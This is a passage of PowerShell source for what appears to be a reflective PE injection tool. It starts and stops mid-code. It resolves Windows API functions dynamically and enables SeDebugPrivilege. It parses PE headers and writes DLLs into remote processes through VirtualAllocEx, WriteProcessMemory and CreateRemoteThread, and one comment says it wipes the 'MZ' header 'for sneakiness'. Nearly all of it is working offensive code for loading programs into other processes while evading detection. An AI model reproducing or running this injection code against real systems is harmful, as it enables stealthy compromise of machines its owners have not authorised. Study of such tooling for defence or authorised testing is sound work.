TOKEN_ADJUST_PRIVILEGES -Value 0x0020 $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2 $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0 return $Win32Constants } Function Get-Win32Functions { $Win32Functions = New-Object System.Object $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate) $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate) $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr]) $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy $memsetAddr = Get-ProcAddress msvcrt.dll memset $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr]) $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr]) $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr]) $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress $GetProcAddressOrdinalAddr = Get-ProcAddress kernel32.dll GetProcAddress $GetProcAddressOrdinalDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr]) $GetProcAddressOrdinal = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressOrdinalAddr, $GetProcAddressOrdinalDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressOrdinal -Value $GetProcAddressOrdinal $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool]) $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate) $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool]) $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate) $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]) $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate) $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr]) $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate) $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary $FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr]) $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32]) $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool]) $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool]) $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool]) $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool]) $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr]) $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool]) $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool]) $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool]) $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32]) $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr]) $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread $LocalFreeAddr = Get-ProcAddress kernel32.dll VirtualFree $LocalFreeDelegate = Get-DelegateType @([IntPtr]) $LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate) $Win32Functions | Add-Member NoteProperty -Name LocalFree -Value $LocalFree return $Win32Functions } ##################################### ##################################### ########### HELPERS ############ ##################################### #Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function #This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses Function Sub-SignedIntAsUnsigned { Param( [Parameter(Position = 0, Mandatory = $true)] [Int64] $Value1, [Parameter(Position = 1, Mandatory = $true)] [Int64] $Value2 ) [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) if ($Value1Bytes.Count -eq $Value2Bytes.Count) { $CarryOver = 0 for ($i = 0; $i -lt $Value1Bytes.Count; $i++) { $Val = $Value1Bytes[$i] - $CarryOver #Sub bytes if ($Val -lt $Value2Bytes[$i]) { $Val += 256 $CarryOver = 1 } else { $CarryOver = 0 } [UInt16]$Sum = $Val - $Value2Bytes[$i] $FinalBytes[$i] = $Sum -band 0x00FF } } else { Throw "Cannot subtract bytearrays of different sizes" } return [BitConverter]::ToInt64($FinalBytes, 0) } Function Add-SignedIntAsUnsigned { Param( [Parameter(Position = 0, Mandatory = $true)] [Int64] $Value1, [Parameter(Position = 1, Mandatory = $true)] [Int64] $Value2 ) [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) if ($Value1Bytes.Count -eq $Value2Bytes.Count) { $CarryOver = 0 for ($i = 0; $i -lt $Value1Bytes.Count; $i++) { #Add bytes [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver $FinalBytes[$i] = $Sum -band 0x00FF if (($Sum -band 0xFF00) -eq 0x100) { $CarryOver = 1 } else { $CarryOver = 0 } } } else { Throw "Cannot add bytearrays of different sizes" } return [BitConverter]::ToInt64($FinalBytes, 0) } Function Compare-Val1GreaterThanVal2AsUInt { Param( [Parameter(Position = 0, Mandatory = $true)] [Int64] $Value1, [Parameter(Position = 1, Mandatory = $true)] [Int64] $Value2 ) [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) if ($Value1Bytes.Count -eq $Value2Bytes.Count) { for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--) { if ($Value1Bytes[$i] -gt $Value2Bytes[$i]) { return $true } elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i]) { return $false } } } else { Throw "Cannot compare byte arrays of different size" } return $false } Function Convert-UIntToInt { Param( [Parameter(Position = 0, Mandatory = $true)] [UInt64] $Value ) [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value) return ([BitConverter]::ToInt64($ValueBytes, 0)) } Function Test-MemoryRangeValid { Param( [Parameter(Position = 0, Mandatory = $true)] [String] $DebugString, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 2, Mandatory = $true)] [IntPtr] $StartAddress, [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)] [IntPtr] $EndAddress, [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)] [IntPtr] $Size ) [IntPtr]$FinalEndAddress = [IntPtr]::Zero if ($PsCmdlet.ParameterSetName -eq "Size") { [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) } else { $FinalEndAddress = $EndAddress } $PEEndAddress = $PEInfo.EndAddress if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true) { Throw "Trying to write to memory smaller than allocated address range. $DebugString" } if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true) { Throw "Trying to write to memory greater than allocated address range. $DebugString" } } Function Write-BytesToMemory { Param( [Parameter(Position=0, Mandatory = $true)] [Byte[]] $Bytes, [Parameter(Position=1, Mandatory = $true)] [IntPtr] $MemoryAddress ) for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++) { [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset]) } } #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ Function Get-DelegateType { Param ( [OutputType([Type])] [Parameter( Position = 0)] [Type[]] $Parameters = (New-Object Type[](0)), [Parameter( Position = 1 )] [Type] $ReturnType = [Void] ) $Domain = [AppDomain]::CurrentDomain $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) $MethodBuilder.SetImplementationFlags('Runtime, Managed') Write-Output $TypeBuilder.CreateType() } #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ Function Get-ProcAddress { Param ( [OutputType([IntPtr])] [Parameter( Position = 0, Mandatory = $True )] [String] $Module, [Parameter( Position = 1, Mandatory = $True )] [String] $Procedure ) # Get a reference to System.dll in the GAC $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') # Get a reference to the GetModuleHandle and GetProcAddress methods $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') # Get a handle to the module specified $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) $tmpPtr = New-Object IntPtr $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) # Return the address of the function Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) } Function Enable-SeDebugPrivilege { Param( [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Types, [Parameter(Position = 3, Mandatory = $true)] [System.Object] $Win32Constants ) [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke() if ($ThreadHandle -eq [IntPtr]::Zero) { Throw "Unable to get the handle to the current thread" } [IntPtr]$ThreadToken = [IntPtr]::Zero [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) if ($Result -eq $false) { $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) { $Result = $Win32Functions.ImpersonateSelf.Invoke(3) if ($Result -eq $false) { Throw "Unable to impersonate self" } $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) if ($Result -eq $false) { Throw "Unable to OpenThreadToken." } } else { Throw "Unable to OpenThreadToken. Error code: $ErrorCode" } } [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID)) $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid) if ($Result -eq $false) { Throw "Unable to call LookupPrivilegeValue" } [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES) [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES) $TokenPrivileges.PrivilegeCount = 1 $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID) $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true) $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value if (($Result -eq $false) -or ($ErrorCode -ne 0)) { #Throw "Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode" #todo need to detect if already set } [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem) } Function Invoke-CreateRemoteThread { Param( [Parameter(Position = 1, Mandatory = $true)] [IntPtr] $ProcessHandle, [Parameter(Position = 2, Mandatory = $true)] [IntPtr] $StartAddress, [Parameter(Position = 3, Mandatory = $false)] [IntPtr] $ArgumentPtr = [IntPtr]::Zero, [Parameter(Position = 4, Mandatory = $true)] [System.Object] $Win32Functions ) [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero $OSVersion = [Environment]::OSVersion.Version #Vista and Win7 if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))) { Write-Verbose "Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress" $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero) $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() if ($RemoteThreadHandle -eq [IntPtr]::Zero) { Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError" } } #XP/Win8 else { Write-Verbose "Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress" $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero) } if ($RemoteThreadHandle -eq [IntPtr]::Zero) { Write-Verbose "Error creating remote thread, thread handle is null" } return $RemoteThreadHandle } Function Get-ImageNtHeaders { Param( [Parameter(Position = 0, Mandatory = $true)] [IntPtr] $PEHandle, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Types ) $NtHeadersInfo = New-Object System.Object #Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER) #Get IMAGE_NT_HEADERS [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew)) $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64) #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen. if ($imageNtHeaders64.Signature -ne 0x00004550) { throw "Invalid IMAGE_NT_HEADER signature." } if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC') { $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64 $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true } else { $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32) $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32 $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false } return $NtHeadersInfo } #This function will get the information needed to allocated space in memory for the PE Function Get-PEBasicInfo { Param( [Parameter( Position = 0, Mandatory = $true )] [Byte[]] $PEBytes, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Types ) $PEInfo = New-Object System.Object #Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot. [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length) [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null #Get NtHeadersInfo $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types #Build a structure with the information which will be needed for allocating memory and writing the PE to memory $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit) $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase) $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders) $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics) #Free the memory allocated above, this isn't where we allocate the PE to memory [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes) return $PEInfo } #PEInfo must contain the following NoteProperties: # PEHandle: An IntPtr to the address the PE is loaded to in memory Function Get-PEDetailedInfo { Param( [Parameter( Position = 0, Mandatory = $true)] [IntPtr] $PEHandle, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Types, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Constants ) if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero) { throw 'PEHandle is null or IntPtr.Zero' } $PEInfo = New-Object System.Object #Get NtHeaders information $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types #Build the PEInfo object $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS) $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr) $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit) $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) if ($PEInfo.PE64Bit -eq $true) { [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64))) $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr } else { [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32))) $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr } if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL) { $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL' } elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) { $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE' } else { Throw "PE file is not an EXE or DLL" } return $PEInfo } Function Import-DllInRemoteProcess { Param( [Parameter(Position=0, Mandatory=$true)] [IntPtr] $RemoteProcHandle, [Parameter(Position=1, Mandatory=$true)] [IntPtr] $ImportDllPathPtr ) $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr) $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1) $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) if ($RImportDllPathPtr -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process" } [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten) if ($Success -eq $false) { Throw "Unable to write DLL path to remote process memory" } if ($DllPathSize -ne $NumBytesWritten) { Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process" } $Kernel32Handle = 